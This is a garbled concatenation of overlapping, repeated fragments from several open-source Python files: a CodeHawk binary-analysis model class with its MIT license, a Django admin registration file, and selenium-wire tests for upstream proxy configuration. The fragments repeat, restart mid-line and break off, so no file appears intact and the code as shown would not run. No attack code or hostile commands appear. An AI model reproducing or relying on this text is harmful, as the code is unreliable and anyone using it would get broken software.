OR", "[ DllFunctionParameter(self,p) for p in self.xnode.findall('par') ] def get_stack_parameters(self): stackparams = [ p", "__init__(self,summary,xnode): self.summary = summary self.xnode = xnode def get_calling_convention(self): return xnode.get('cc') def get_adjustment(self):", "person obtaining a copy # of this software and associated documentation files (the", "LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND", "OR OTHER DEALINGS IN THE # SOFTWARE. # ------------------------------------------------------------------------------ from chb.models.DllFunctionParameter import DllFunctionParameter", "# furnished to do so, subject to the following conditions: # # The", "the Software, and to permit persons to whom the Software is # furnished", "permit persons to whom the Software is # furnished to do so, subject", "rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell #", "DEALINGS IN THE # SOFTWARE. # ------------------------------------------------------------------------------ from chb.models.DllFunctionParameter import DllFunctionParameter class DllFunctionAPI(object):", "def get_parameters(self): return [ DllFunctionParameter(self,p) for p in self.xnode.findall('par') ] def get_stack_parameters(self): stackparams", "Permission is hereby granted, free of charge, to any person obtaining a copy", "OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. # ------------------------------------------------------------------------------ from", "[ p for p in self.get_parameters() if p.is_stack_parameter() ] return sorted(stackparams,key=lambda p:p.get_stack_nr()) def", "THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR", "A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR", "SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR #", "FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF", "in the Software without restriction, including without limitation the rights # to use,", "IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT", "EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,", "Software without restriction, including without limitation the rights # to use, copy, modify,", "Kestrel Technology LLC # # Permission is hereby granted, free of charge, to", "# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies", "merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to", "PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS", "OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING", "ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE", "copies of the Software, and to permit persons to whom the Software is", "# The above copyright notice and this permission notice shall be included in", "included in all # copies or substantial portions of the Software. # #", "return [ DllFunctionParameter(self,p) for p in self.xnode.findall('par') ] def get_stack_parameters(self): stackparams = [", "# ------------------------------------------------------------------------------ # Access to the CodeHawk Binary Analyzer Analysis Results # Author:", "# of this software and associated documentation files (the \"Software\"), to deal #", "------------------------------------------------------------------------------ # Access to the CodeHawk Binary Analyzer Analysis Results # Author: <NAME>", "to do so, subject to the following conditions: # # The above copyright", "OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR", "xnode def get_calling_convention(self): return xnode.get('cc') def get_adjustment(self): return int(xnode.get('adj')) def get_parameters(self): return [", "def get_calling_convention(self): return xnode.get('cc') def get_adjustment(self): return int(xnode.get('adj')) def get_parameters(self): return [ DllFunctionParameter(self,p)", "is hereby granted, free of charge, to any person obtaining a copy #", "above copyright notice and this permission notice shall be included in all #", "persons to whom the Software is # furnished to do so, subject to", "sell # copies of the Software, and to permit persons to whom the", "WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE.", "conditions: # # The above copyright notice and this permission notice shall be", "substantial portions of the Software. # # THE SOFTWARE IS PROVIDED \"AS IS\",", "INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A", "# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE", "AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR", "OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,", "self.xnode.findall('par') ] def get_stack_parameters(self): stackparams = [ p for p in self.get_parameters() if", "documentation files (the \"Software\"), to deal # in the Software without restriction, including", "xnode.get('cc') def get_adjustment(self): return int(xnode.get('adj')) def get_parameters(self): return [ DllFunctionParameter(self,p) for p in", "Author: <NAME> # ------------------------------------------------------------------------------ # The MIT License (MIT) # # Copyright (c)", "to permit persons to whom the Software is # furnished to do so,", "ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT,", "or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED \"AS", "get_stack_parameters(self): stackparams = [ p for p in self.get_parameters() if p.is_stack_parameter() ] return", "class DllFunctionAPI(object): def __init__(self,summary,xnode): self.summary = summary self.xnode = xnode def get_calling_convention(self): return", "chb.models.DllFunctionParameter import DllFunctionParameter class DllFunctionAPI(object): def __init__(self,summary,xnode): self.summary = summary self.xnode = xnode", "notice shall be included in all # copies or substantial portions of the", "restriction, including without limitation the rights # to use, copy, modify, merge, publish,", "DllFunctionParameter(self,p) for p in self.xnode.findall('par') ] def get_stack_parameters(self): stackparams = [ p for", "obtaining a copy # of this software and associated documentation files (the \"Software\"),", "of charge, to any person obtaining a copy # of this software and", "whom the Software is # furnished to do so, subject to the following", "p in self.xnode.findall('par') ] def get_stack_parameters(self): stackparams = [ p for p in", "CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH", "NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE", "FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS", "Binary Analyzer Analysis Results # Author: <NAME> # ------------------------------------------------------------------------------ # The MIT License", "# # Permission is hereby granted, free of charge, to any person obtaining", "MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL", "get_adjustment(self): return int(xnode.get('adj')) def get_parameters(self): return [ DllFunctionParameter(self,p) for p in self.xnode.findall('par') ]", "if p.is_stack_parameter() ] return sorted(stackparams,key=lambda p:p.get_stack_nr()) def get_stack_parameter_names(self): stackparams = self.get_stack_parameters() return [", "free of charge, to any person obtaining a copy # of this software", "= summary self.xnode = xnode def get_calling_convention(self): return xnode.get('cc') def get_adjustment(self): return int(xnode.get('adj'))", "return xnode.get('cc') def get_adjustment(self): return int(xnode.get('adj')) def get_parameters(self): return [ DllFunctionParameter(self,p) for p", "shall be included in all # copies or substantial portions of the Software.", "import DllFunctionParameter class DllFunctionAPI(object): def __init__(self,summary,xnode): self.summary = summary self.xnode = xnode def", "get_calling_convention(self): return xnode.get('cc') def get_adjustment(self): return int(xnode.get('adj')) def get_parameters(self): return [ DllFunctionParameter(self,p) for", "PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT", "copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software,", "The above copyright notice and this permission notice shall be included in all", "BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR", "and/or sell # copies of the Software, and to permit persons to whom", "so, subject to the following conditions: # # The above copyright notice and", "this permission notice shall be included in all # copies or substantial portions", "LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION", "p for p in self.get_parameters() if p.is_stack_parameter() ] return sorted(stackparams,key=lambda p:p.get_stack_nr()) def get_stack_parameter_names(self):", "License (MIT) # # Copyright (c) 2016-2020 Kestrel Technology LLC # # Permission", "FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE", "OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT", "without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense,", "# copies or substantial portions of the Software. # # THE SOFTWARE IS", "PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING", "# in the Software without restriction, including without limitation the rights # to", "is # furnished to do so, subject to the following conditions: # #", "files (the \"Software\"), to deal # in the Software without restriction, including without", "Software. # # THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY", "# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS", "# SOFTWARE. # ------------------------------------------------------------------------------ from chb.models.DllFunctionParameter import DllFunctionParameter class DllFunctionAPI(object): def __init__(self,summary,xnode): self.summary", "sorted(stackparams,key=lambda p:p.get_stack_nr()) def get_stack_parameter_names(self): stackparams = self.get_stack_parameters() return [ p.name for p in", "= [ p for p in self.get_parameters() if p.is_stack_parameter() ] return sorted(stackparams,key=lambda p:p.get_stack_nr())", "# ------------------------------------------------------------------------------ from chb.models.DllFunctionParameter import DllFunctionParameter class DllFunctionAPI(object): def __init__(self,summary,xnode): self.summary = summary", "copy # of this software and associated documentation files (the \"Software\"), to deal", "for p in self.get_parameters() if p.is_stack_parameter() ] return sorted(stackparams,key=lambda p:p.get_stack_nr()) def get_stack_parameter_names(self): stackparams", "# Access to the CodeHawk Binary Analyzer Analysis Results # Author: <NAME> #", "IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE", "for p in self.xnode.findall('par') ] def get_stack_parameters(self): stackparams = [ p for p", "def __init__(self,summary,xnode): self.summary = summary self.xnode = xnode def get_calling_convention(self): return xnode.get('cc') def", "to the following conditions: # # The above copyright notice and this permission", "TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE", "Access to the CodeHawk Binary Analyzer Analysis Results # Author: <NAME> # ------------------------------------------------------------------------------", "to deal # in the Software without restriction, including without limitation the rights", "the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell", "to any person obtaining a copy # of this software and associated documentation", "p in self.get_parameters() if p.is_stack_parameter() ] return sorted(stackparams,key=lambda p:p.get_stack_nr()) def get_stack_parameter_names(self): stackparams =", "# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS", "] return sorted(stackparams,key=lambda p:p.get_stack_nr()) def get_stack_parameter_names(self): stackparams = self.get_stack_parameters() return [ p.name for", "following conditions: # # The above copyright notice and this permission notice shall", "p:p.get_stack_nr()) def get_stack_parameter_names(self): stackparams = self.get_stack_parameters() return [ p.name for p in stackparams", "of the Software, and to permit persons to whom the Software is #", "in all # copies or substantial portions of the Software. # # THE", "the Software. # # THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF", "def get_stack_parameters(self): stackparams = [ p for p in self.get_parameters() if p.is_stack_parameter() ]", "THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. #", "p.is_stack_parameter() ] return sorted(stackparams,key=lambda p:p.get_stack_nr()) def get_stack_parameter_names(self): stackparams = self.get_stack_parameters() return [ p.name", "and associated documentation files (the \"Software\"), to deal # in the Software without", "OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, #", "DllFunctionAPI(object): def __init__(self,summary,xnode): self.summary = summary self.xnode = xnode def get_calling_convention(self): return xnode.get('cc')", "any person obtaining a copy # of this software and associated documentation files", "THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN", "# # The above copyright notice and this permission notice shall be included", "IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR", "2016-2020 Kestrel Technology LLC # # Permission is hereby granted, free of charge,", "\"Software\"), to deal # in the Software without restriction, including without limitation the", "OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE", "from chb.models.DllFunctionParameter import DllFunctionParameter class DllFunctionAPI(object): def __init__(self,summary,xnode): self.summary = summary self.xnode =", "LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, #", "FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE #", "SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES", "stackparams = [ p for p in self.get_parameters() if p.is_stack_parameter() ] return sorted(stackparams,key=lambda", "def get_stack_parameter_names(self): stackparams = self.get_stack_parameters() return [ p.name for p in stackparams ]", "BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN", "AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE", "IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED,", "sublicense, and/or sell # copies of the Software, and to permit persons to", "a copy # of this software and associated documentation files (the \"Software\"), to", "deal # in the Software without restriction, including without limitation the rights #", "Software is # furnished to do so, subject to the following conditions: #", "# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR", "Software, and to permit persons to whom the Software is # furnished to", "OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER", "The MIT License (MIT) # # Copyright (c) 2016-2020 Kestrel Technology LLC #", "CodeHawk Binary Analyzer Analysis Results # Author: <NAME> # ------------------------------------------------------------------------------ # The MIT", "LLC # # Permission is hereby granted, free of charge, to any person", "Analysis Results # Author: <NAME> # ------------------------------------------------------------------------------ # The MIT License (MIT) #", "including without limitation the rights # to use, copy, modify, merge, publish, distribute,", "HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN", "CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT", "OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE", "return sorted(stackparams,key=lambda p:p.get_stack_nr()) def get_stack_parameter_names(self): stackparams = self.get_stack_parameters() return [ p.name for p", "all # copies or substantial portions of the Software. # # THE SOFTWARE", "] def get_stack_parameters(self): stackparams = [ p for p in self.get_parameters() if p.is_stack_parameter()", "AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER #", "(the \"Software\"), to deal # in the Software without restriction, including without limitation", "<NAME> # ------------------------------------------------------------------------------ # The MIT License (MIT) # # Copyright (c) 2016-2020", "this software and associated documentation files (the \"Software\"), to deal # in the", "IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR", "copyright notice and this permission notice shall be included in all # copies", "distribute, sublicense, and/or sell # copies of the Software, and to permit persons", "(c) 2016-2020 Kestrel Technology LLC # # Permission is hereby granted, free of", "# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER", "------------------------------------------------------------------------------ # The MIT License (MIT) # # Copyright (c) 2016-2020 Kestrel Technology", "in self.get_parameters() if p.is_stack_parameter() ] return sorted(stackparams,key=lambda p:p.get_stack_nr()) def get_stack_parameter_names(self): stackparams = self.get_stack_parameters()", "Analyzer Analysis Results # Author: <NAME> # ------------------------------------------------------------------------------ # The MIT License (MIT)", "charge, to any person obtaining a copy # of this software and associated", "associated documentation files (the \"Software\"), to deal # in the Software without restriction,", "USE OR OTHER DEALINGS IN THE # SOFTWARE. # ------------------------------------------------------------------------------ from chb.models.DllFunctionParameter import", "= xnode def get_calling_convention(self): return xnode.get('cc') def get_adjustment(self): return int(xnode.get('adj')) def get_parameters(self): return", "to the CodeHawk Binary Analyzer Analysis Results # Author: <NAME> # ------------------------------------------------------------------------------ #", "WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO", "OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY,", "summary self.xnode = xnode def get_calling_convention(self): return xnode.get('cc') def get_adjustment(self): return int(xnode.get('adj')) def", "hereby granted, free of charge, to any person obtaining a copy # of", "of this software and associated documentation files (the \"Software\"), to deal # in", "<reponame>psifertex/CodeHawk-Binary # ------------------------------------------------------------------------------ # Access to the CodeHawk Binary Analyzer Analysis Results #", "# # Copyright (c) 2016-2020 Kestrel Technology LLC # # Permission is hereby", "Technology LLC # # Permission is hereby granted, free of charge, to any", "of the Software. # # THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY", "the CodeHawk Binary Analyzer Analysis Results # Author: <NAME> # ------------------------------------------------------------------------------ # The", "granted, free of charge, to any person obtaining a copy # of this", "OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS", "SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. # ------------------------------------------------------------------------------", "# copies of the Software, and to permit persons to whom the Software", "self.xnode = xnode def get_calling_convention(self): return xnode.get('cc') def get_adjustment(self): return int(xnode.get('adj')) def get_parameters(self):", "return int(xnode.get('adj')) def get_parameters(self): return [ DllFunctionParameter(self,p) for p in self.xnode.findall('par') ] def", "# # THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND,", "# ------------------------------------------------------------------------------ # The MIT License (MIT) # # Copyright (c) 2016-2020 Kestrel", "WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO", "THE USE OR OTHER DEALINGS IN THE # SOFTWARE. # ------------------------------------------------------------------------------ from chb.models.DllFunctionParameter", "DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR", "WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED", "KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF", "to whom the Software is # furnished to do so, subject to the", "DllFunctionParameter class DllFunctionAPI(object): def __init__(self,summary,xnode): self.summary = summary self.xnode = xnode def get_calling_convention(self):", "limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or", "Copyright (c) 2016-2020 Kestrel Technology LLC # # Permission is hereby granted, free", "# The MIT License (MIT) # # Copyright (c) 2016-2020 Kestrel Technology LLC", "permission notice shall be included in all # copies or substantial portions of", "furnished to do so, subject to the following conditions: # # The above", "and this permission notice shall be included in all # copies or substantial", "modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and", "ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES", "be included in all # copies or substantial portions of the Software. #", "NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY", "COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER", "# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,", "THE # SOFTWARE. # ------------------------------------------------------------------------------ from chb.models.DllFunctionParameter import DllFunctionParameter class DllFunctionAPI(object): def __init__(self,summary,xnode):", "self.summary = summary self.xnode = xnode def get_calling_convention(self): return xnode.get('cc') def get_adjustment(self): return", "# Permission is hereby granted, free of charge, to any person obtaining a", "self.get_parameters() if p.is_stack_parameter() ] return sorted(stackparams,key=lambda p:p.get_stack_nr()) def get_stack_parameter_names(self): stackparams = self.get_stack_parameters() return", "SOFTWARE. # ------------------------------------------------------------------------------ from chb.models.DllFunctionParameter import DllFunctionParameter class DllFunctionAPI(object): def __init__(self,summary,xnode): self.summary =", "to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of", "def get_adjustment(self): return int(xnode.get('adj')) def get_parameters(self): return [ DllFunctionParameter(self,p) for p in self.xnode.findall('par')", "in self.xnode.findall('par') ] def get_stack_parameters(self): stackparams = [ p for p in self.get_parameters()", "OTHER DEALINGS IN THE # SOFTWARE. # ------------------------------------------------------------------------------ from chb.models.DllFunctionParameter import DllFunctionParameter class", "IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF", "the Software is # furnished to do so, subject to the following conditions:", "subject to the following conditions: # # The above copyright notice and this", "notice and this permission notice shall be included in all # copies or" ]
[ "import Post, File, Comment class FileInline(GenericTabularInline): model = File class PostAdmin(admin.ModelAdmin): inlines =", "<reponame>naritotakizawa/django-genericforeignkey-sample from django.contrib import admin from django.contrib.contenttypes.admin import GenericTabularInline from .models import Post,", "File, Comment class FileInline(GenericTabularInline): model = File class PostAdmin(admin.ModelAdmin): inlines = [FileInline] class", "import admin from django.contrib.contenttypes.admin import GenericTabularInline from .models import Post, File, Comment class", "class PostAdmin(admin.ModelAdmin): inlines = [FileInline] class CommentAdmin(admin.ModelAdmin): inlines = [FileInline] admin.site.register(Comment, CommentAdmin) admin.site.register(Post,", "= File class PostAdmin(admin.ModelAdmin): inlines = [FileInline] class CommentAdmin(admin.ModelAdmin): inlines = [FileInline] admin.site.register(Comment,", "FileInline(GenericTabularInline): model = File class PostAdmin(admin.ModelAdmin): inlines = [FileInline] class CommentAdmin(admin.ModelAdmin): inlines =", "django.contrib import admin from django.contrib.contenttypes.admin import GenericTabularInline from .models import Post, File, Comment", ".models import Post, File, Comment class FileInline(GenericTabularInline): model = File class PostAdmin(admin.ModelAdmin): inlines", "GenericTabularInline from .models import Post, File, Comment class FileInline(GenericTabularInline): model = File class", "Comment class FileInline(GenericTabularInline): model = File class PostAdmin(admin.ModelAdmin): inlines = [FileInline] class CommentAdmin(admin.ModelAdmin):", "inlines = [FileInline] class CommentAdmin(admin.ModelAdmin): inlines = [FileInline] admin.site.register(Comment, CommentAdmin) admin.site.register(Post, PostAdmin) admin.site.register(File)", "from django.contrib import admin from django.contrib.contenttypes.admin import GenericTabularInline from .models import Post, File,", "from django.contrib.contenttypes.admin import GenericTabularInline from .models import Post, File, Comment class FileInline(GenericTabularInline): model", "model = File class PostAdmin(admin.ModelAdmin): inlines = [FileInline] class CommentAdmin(admin.ModelAdmin): inlines = [FileInline]", "import GenericTabularInline from .models import Post, File, Comment class FileInline(GenericTabularInline): model = File", "class FileInline(GenericTabularInline): model = File class PostAdmin(admin.ModelAdmin): inlines = [FileInline] class CommentAdmin(admin.ModelAdmin): inlines", "from .models import Post, File, Comment class FileInline(GenericTabularInline): model = File class PostAdmin(admin.ModelAdmin):", "PostAdmin(admin.ModelAdmin): inlines = [FileInline] class CommentAdmin(admin.ModelAdmin): inlines = [FileInline] admin.site.register(Comment, CommentAdmin) admin.site.register(Post, PostAdmin)", "admin from django.contrib.contenttypes.admin import GenericTabularInline from .models import Post, File, Comment class FileInline(GenericTabularInline):", "File class PostAdmin(admin.ModelAdmin): inlines = [FileInline] class CommentAdmin(admin.ModelAdmin): inlines = [FileInline] admin.site.register(Comment, CommentAdmin)", "django.contrib.contenttypes.admin import GenericTabularInline from .models import Post, File, Comment class FileInline(GenericTabularInline): model =", "Post, File, Comment class FileInline(GenericTabularInline): model = File class PostAdmin(admin.ModelAdmin): inlines = [FileInline]" ]
[ "https.scheme) self.assertEqual('username3', https.username) self.assertEqual('password3', https.password) self.assertEqual('server3:8888', https.hostport) self.assertEqual('localhost', proxy['no_proxy']) def test_none(self): options =", "http.hostport) # The dict config overrides that defined in env variables https =", "proxy['no_proxy']) def test_get_from_env(self): with self.set_env(HTTP_PROXY='http://username1:password1@server1:8888', HTTPS_PROXY='https://username2:password2@server2:8888', NO_PROXY='localhost'): proxy = get_upstream_proxy({}) http = proxy['http']", "proxy['no_proxy']) def test_merge(self): options = { 'proxy': { 'https': 'https://username3:password3@server3:8888', 'no_proxy': 'localhost' }", "{ 'http': 'http://username1:password1@server1:8888', 'https': 'https://username2:password2@server2:8888', 'no_proxy': 'localhost' } } proxy = get_upstream_proxy(options) http", "= { 'proxy': { 'http': 'http://username1:password1@server1:8888', 'https': 'https://username2:password2@server2:8888', 'no_proxy': 'localhost' } } proxy", "unittest import TestCase from seleniumwire.proxy.utils import get_upstream_proxy class GetUpstreamProxyTest(TestCase): def test_get_config(self): options =", "get_upstream_proxy(options) http = proxy['http'] self.assertEqual('http', http.scheme) self.assertEqual('username1', http.username) self.assertEqual('password1', http.password) self.assertEqual('server1:8888', http.hostport) #", "'no_proxy': 'localhost' } } proxy = get_upstream_proxy(options) http = proxy['http'] self.assertEqual('http', http.scheme) self.assertEqual('username1',", "that defined in env variables https = proxy['https'] self.assertEqual('https', https.scheme) self.assertEqual('username3', https.username) self.assertEqual('password3',", "'no_proxy': 'localhost' } } with self.set_env(HTTP_PROXY='http://username1:password1@server1:8888', HTTPS_PROXY='https://username2:password2@server2:8888', NO_PROXY='127.0.0.1'): proxy = get_upstream_proxy(options) http =", "self.set_env(HTTP_PROXY='http://username1:password1@server1:8888', HTTPS_PROXY='https://username2:password2@server2:8888', NO_PROXY='127.0.0.1'): proxy = get_upstream_proxy(options) http = proxy['http'] self.assertEqual('http', http.scheme) self.assertEqual('username1', http.username)", "{ 'https': 'https://username3:password3@server3:8888', 'no_proxy': 'localhost' } } with self.set_env(HTTP_PROXY='http://username1:password1@server1:8888', HTTPS_PROXY='https://username2:password2@server2:8888', NO_PROXY='127.0.0.1'): proxy =", "https.username) self.assertEqual('password2', https.password) self.assertEqual('server2:8888', https.hostport) self.assertEqual('localhost', proxy['no_proxy']) def test_get_from_env(self): with self.set_env(HTTP_PROXY='http://username1:password1@server1:8888', HTTPS_PROXY='https://username2:password2@server2:8888', NO_PROXY='localhost'):", "GetUpstreamProxyTest(TestCase): def test_get_config(self): options = { 'proxy': { 'http': 'http://username1:password1@server1:8888', 'https': 'https://username2:password2@server2:8888', 'no_proxy':", "http.username) self.assertEqual('password1', http.password) self.assertEqual('server1:8888', http.hostport) https = proxy['https'] self.assertEqual('https', https.scheme) self.assertEqual('username2', https.username) self.assertEqual('password2',", "temporarily set environment vars.\"\"\" old_environ = dict(os.environ) os.environ.update(environ) try: yield finally: os.environ.clear() os.environ.update(old_environ)", "self.assertEqual('password2', https.password) self.assertEqual('server2:8888', https.hostport) self.assertEqual('localhost', proxy['no_proxy']) def test_merge(self): options = { 'proxy': {", "'localhost' } } proxy = get_upstream_proxy(options) http = proxy['http'] self.assertEqual('http', http.scheme) self.assertEqual('username1', http.username)", "self.assertEqual('https', https.scheme) self.assertEqual('username3', https.username) self.assertEqual('password3', https.password) self.assertEqual('server3:8888', https.hostport) self.assertEqual('localhost', proxy['no_proxy']) def test_none(self): options", "} proxy = get_upstream_proxy(options) http = proxy['http'] self.assertEqual('http', http.scheme) self.assertEqual('username1', http.username) self.assertEqual('password1', http.password)", "https.password) self.assertEqual('server2:8888', https.hostport) self.assertEqual('localhost', proxy['no_proxy']) def test_merge(self): options = { 'proxy': { 'https':", "proxy['https'] self.assertEqual('https', https.scheme) self.assertEqual('username3', https.username) self.assertEqual('password3', https.password) self.assertEqual('server3:8888', https.hostport) self.assertEqual('localhost', proxy['no_proxy']) def test_none(self):", "http = proxy['http'] self.assertEqual('http', http.scheme) self.assertEqual('username1', http.username) self.assertEqual('password1', http.password) self.assertEqual('server1:8888', http.hostport) # The", "self.assertEqual('password1', http.password) self.assertEqual('server1:8888', http.hostport) # The dict config overrides that defined in env", "https.password) self.assertEqual('server3:8888', https.hostport) self.assertEqual('localhost', proxy['no_proxy']) def test_none(self): options = None proxy = get_upstream_proxy(options)", "manager used to temporarily set environment vars.\"\"\" old_environ = dict(os.environ) os.environ.update(environ) try: yield", "def test_merge(self): options = { 'proxy': { 'https': 'https://username3:password3@server3:8888', 'no_proxy': 'localhost' } }", "{ 'proxy': { 'http': 'http://username1:password1@server1:8888', 'https': 'https://username2:password2@server2:8888', 'no_proxy': 'localhost' } } proxy =", "self.assertEqual('username2', https.username) self.assertEqual('password2', https.password) self.assertEqual('server2:8888', https.hostport) self.assertEqual('localhost', proxy['no_proxy']) def test_get_from_env(self): with self.set_env(HTTP_PROXY='http://username1:password1@server1:8888', HTTPS_PROXY='https://username2:password2@server2:8888',", "proxy['http'] self.assertEqual('http', http.scheme) self.assertEqual('username1', http.username) self.assertEqual('password1', http.password) self.assertEqual('server1:8888', http.hostport) # The dict config", "self.set_env(HTTP_PROXY='http://username1:password1@server1:8888', HTTPS_PROXY='https://username2:password2@server2:8888', NO_PROXY='localhost'): proxy = get_upstream_proxy({}) http = proxy['http'] self.assertEqual('http', http.scheme) self.assertEqual('username1', http.username)", "= get_upstream_proxy(options) http = proxy['http'] self.assertEqual('http', http.scheme) self.assertEqual('username1', http.username) self.assertEqual('password1', http.password) self.assertEqual('server1:8888', http.hostport)", "overrides that defined in env variables https = proxy['https'] self.assertEqual('https', https.scheme) self.assertEqual('username3', https.username)", "env variables https = proxy['https'] self.assertEqual('https', https.scheme) self.assertEqual('username3', https.username) self.assertEqual('password3', https.password) self.assertEqual('server3:8888', https.hostport)", "https.username) self.assertEqual('password3', https.password) self.assertEqual('server3:8888', https.hostport) self.assertEqual('localhost', proxy['no_proxy']) def test_none(self): options = None proxy", "self.assertEqual('localhost', proxy['no_proxy']) def test_get_from_env(self): with self.set_env(HTTP_PROXY='http://username1:password1@server1:8888', HTTPS_PROXY='https://username2:password2@server2:8888', NO_PROXY='localhost'): proxy = get_upstream_proxy({}) http =", "'localhost' } } with self.set_env(HTTP_PROXY='http://username1:password1@server1:8888', HTTPS_PROXY='https://username2:password2@server2:8888', NO_PROXY='127.0.0.1'): proxy = get_upstream_proxy(options) http = proxy['http']", "self.assertEqual('username1', http.username) self.assertEqual('password1', http.password) self.assertEqual('server1:8888', http.hostport) https = proxy['https'] self.assertEqual('https', https.scheme) self.assertEqual('username2', https.username)", 